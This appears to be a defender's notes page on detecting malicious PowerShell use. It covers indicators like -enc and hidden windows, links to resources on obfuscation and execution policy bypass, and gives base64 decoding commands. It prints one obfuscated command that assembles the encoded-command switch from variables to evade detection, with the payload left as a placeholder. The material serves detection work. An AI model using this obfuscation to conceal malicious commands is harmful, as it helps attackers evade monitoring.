Powershell.exe is one of the most commonly used utilities built into Windows. Its uses are too numerous to capture here. With powershell behavior it can be difficult to distinguish between admin and attacker behavior. Attackers often use this tool because it is so powerful, but also because it is so common. Some of the indicators of attacker use are command line switches like –enc or HiddenWindow. While these are also used in legitimate cases, they are of typically of sufficient interest to look deeper at the surrounding context of powershell's use. Powershell Obfuscation: https://www.trustedsec.com/blog/circumventing-encodedcommand-detection-powershell/ e.g: powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() <base64_string> Powershell Execution Policy Bypass Techniques https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ Powershell alternatives to the traditional host info e.g. whoami: http://www.blackhillsinfosec.com/?p=5824 Base64 Decode To decode a base64 string on Mac: echo [base64string without brackets] | base64 –D To decode a base64 string on Windows: echo [base64string without brackets] > encoded.txt certutil -decode encoded.txt decoded.txt type decoded.txt Decode base64 in Powershell: PS > [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("encoded stuff goes here "))